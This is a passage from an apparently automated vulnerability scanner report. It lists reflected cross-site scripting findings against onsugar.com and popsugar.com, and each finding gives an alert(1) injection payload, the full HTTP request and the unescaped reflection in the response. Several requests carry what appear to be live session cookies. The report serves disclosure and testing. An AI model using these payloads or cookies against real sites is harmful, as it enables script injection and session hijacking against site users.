Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/statica4d96"><script>alert(1)</script>5c26a4aba3e/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...
2.124. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4626a"-alert(1)-"62698f08092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static4626a"-alert(1)-"62698f08092/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832642%7CPlX7exM%2F2VKT4xhnnXce4TwYjmyaLu5fXuolcj%2B39sgDSw9zzrwXiF6yXituIHWATQkjYJVp9AbgdMJ6szw875Gkx%2BuAvXudo7leHhX%2F8iJMk%2BxPhd39jzHp6Hem%2FCHJbPzTI1P6Np4wskedc4UjSxjRf6D6vWf5VxS4%2Fk66DYdDvmuNF9Y8D3NTG%2BCe1AZ9tj83XQw%2Fsdfm2z17mlTlnA%3D%3D%7C32acfef3993955b12c9f4ef4b50c4912e752e802; expires=Wed, 05-Oct-2011 16:37:22 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:02 GMT
Server: lighttpd/1.4.26
Content-Length: 8011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static4626a"-alert(1)-"62698f08092/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...
2.125. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc9e"><script>alert(1)</script>b1683b2d7ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C4dc9e"><script>alert(1)</script>b1683b2d7ca/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web016-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832644%7Cio2s1Ow5Ncf%2F%2Fl6lcs9xNKXmSCTELGwjgZ%2B30%2BsL%2BBCsKQ1Lv54pc%2FiTc5iX8SFFQIvOXkLhf5bYPeelsJvscy7uLqQZebvK0VYAgwAB42NGUQCNrwF76WrK6%2BnbwWxK92zuu7fijHl8EuYS7xUwWG%2BfIx9RaVwSB%2B3C2MU6z1Qttn6Ir8ABR0cuSKocRVI68BI1Gi56KXlH5tGAHh5KIg%3D%3D%7C97a9f8778b10895f16abe7ced926ed84d50e8017; expires=Wed, 05-Oct-2011 16:37:24 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: lighttpd/1.4.26
Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C4dc9e"><script>alert(1)</script>b1683b2d7ca/script%3Efa900ede36&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...
2.126. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4217b"-alert(1)-"1a7cc52b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C4217b"-alert(1)-"1a7cc52b4/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832645%7CFOnqvD5UU3%2BUJgXtp2jPLd00CihayQtMbrH4XGUffzXA5zB7bhttXGMIFXU1fS1UgZz8Czaxf2aEQ7OOvGv3H5A7e2KdLho551ayNhJBe7uuasmqhM9z7eqWwr0PMT9wtID0JdyilKZu6XUoJjIKl25uXVopt2hpgs46jICOno6xXzuSlDiazg6tbKjGtziEZkG3nGgRR2hKvL7XAJWH%2BQ%3D%3D%7C670bb0a18cfd2ae29f1ecf51d7bd68f46414fc49; expires=Wed, 05-Oct-2011 16:37:25 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:05 GMT
Server: lighttpd/1.4.26
Content-Length: 8001

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C4217b"-alert(1)-"1a7cc52b4/script%3Efa900ede36",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...
2.127. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b281b"-alert(1)-"dce851da1d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36b281b"-alert(1)-"dce851da1d6?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832648%7CS1ct4OelR%2FlO6%2F4TyK3kytYnTtHD2WAkTX9w6edSBh%2BhWeYJBSuQq%2F4ZudckOlNHnYcd3Yg6YA8etZBDdntye8s%2ByoyXo1Cwwuim2ivs2IR7%2FvbA3aM29%2FBrTb3EkoCi7OP%2BqOkQFP%2Ff6%2FgXHOEkNdZlhi4HS0nAfVYjAZ3bbPKqJRJQ1wEUb3gWVsyNHOcas1yiVywhkZcrS2TMEugGrg%3D%3D%7Cb41abd34caa2ce189f969af07b306fc0a82ebb95; expires=Wed, 05-Oct-2011 16:37:28 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:08 GMT
Server: lighttpd/1.4.26
Content-Length: 8011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36b281b"-alert(1)-"dce851da1d6",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...
2.128. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d58f"><script>alert(1)</script>358ef49d22c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede364d58f"><script>alert(1)</script>358ef49d22c?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832647%7CU%2B8KzzGTQDjsyinyxAa5%2FZ2X%2BbF7Ne1pn4rOi%2FO6TkYNHR6ZyOb2a6K1KzAvYfho%2BFqPSlApJzMA1LnLKd4g2hT8Al1%2B%2BUUTxEX3QLGVI%2FVo4nzECvqe9ys%2F7kmnuItNKTr69DNqakEOSfuj5I3HkR8hUMOJJ3H3qPT5bI3kLNvxaBSuOoktB28ILYCaywW%2BkhYj72OcbewWZYoyVv0xKA%3D%3D%7C3b2fc535e94955b0ae945f747c82a641a36ca1a6; expires=Wed, 05-Oct-2011 16:37:27 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:07 GMT
Server: lighttpd/1.4.26
Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede364d58f"><script>alert(1)</script>358ef49d22c&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...
2.129. http://www.onsugar.com/static/ck.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/ck.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505a1"-alert(1)-"c8a5c0fff23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/505a1"-alert(1)-"c8a5c0fff23?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web016-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317831676%7CFWuR3rvfbbY5%2FMDWsCLoTMrE%2FIO9JaMIyUtnAkEQfmXmsJKlgNvmVB6d8yuUQtJKZt5QbQCsVFCvk7vrABwb9YS16L90KsGRkmt2iu5RQUTt%2B2X8Wx2VM%2BktODGDYumTvLgAdDZozVeZgyEbFbs6xM%2FHtEXyK3xwhgU0h%2B%2B2aXLTxDKxn6Fir8ipbCbqRgr9fm0q1TjWwitCn36M9IPJMw%3D%3D%7Ca14adba45dd6721dd7e44ec9b081d759f64dc04a; expires=Wed, 05-Oct-2011 16:21:16 GMT; path=/; httponly
Connection: close
Date: Mon, 12 Sep 2011 12:47:56 GMT
Server: lighttpd/1.4.26
Content-Length: 7687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "a5109bd915fbacdba358a709224af1dd";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/505a1"-alert(1)-"c8a5c0fff23",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...
2.130. http://www.onsugar.com/static/ck.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/ck.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c964"><script>alert(1)</script>fa900ede36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964"><script>alert(1)</script>fa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; expires=Wed, 05-Oct-2011 16:21:15 GMT; path=/; httponly
Connection: close
Date: Mon, 12 Sep 2011 12:47:55 GMT
Server: lighttpd/1.4.26
Content-Length: 7787

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964"><script>alert(1)</script>fa900ede36&c5=&c6=&c15=a5109bd915fbacdba358a709224af1dd&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...
2.131. http://www.popsugar.com/ajaxharness [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbf1"><script>alert(1)</script>0838c82964a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajaxharness9fbf1"><script>alert(1)</script>0838c82964a?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web014-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 216779
Date: Mon, 12 Sep 2011 12:48:03 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831683%7CW7Cc04oKuS%2FFL%2FWDuqxqWUgvLzSfjJaKze7pGoBWOfj6s2o1LE3eGfCCVh6dEpmmV2AqDKGuc4L4PrYYB9Gomsr0m%2BEcEWErb1f5kWM5HmkwZULLF3xDsI5uyNEH2Jvs%2Fl1%2Ftysqnay5H1Ze7gRVfIw0FpM90oXY%2BbhvF1KEzc%2FVlrr1qTRDS3912fXNIHvpbXKpvqVvrtRkgTfFZKpywQ%3D%3D%7Ca957e63a43c4911b378534156090709ab5a6580f; expires=Wed, 05-Oct-2011 16:21:23 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/ajaxharness9fbf1"><script>alert(1)</script>0838c82964a?harness_requests=%7B%22replacements%22%3A+%5B%7B%22sugar-menu-subnav-items%22%3A+%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C+%7B%22user-feedback-div%22%3A+%22%2Fsugar-user-feedba
...[SNIP]...
2.132. http://www.popsugar.com/ajaxharness [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1274b"-alert(1)-"faa5baba69b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

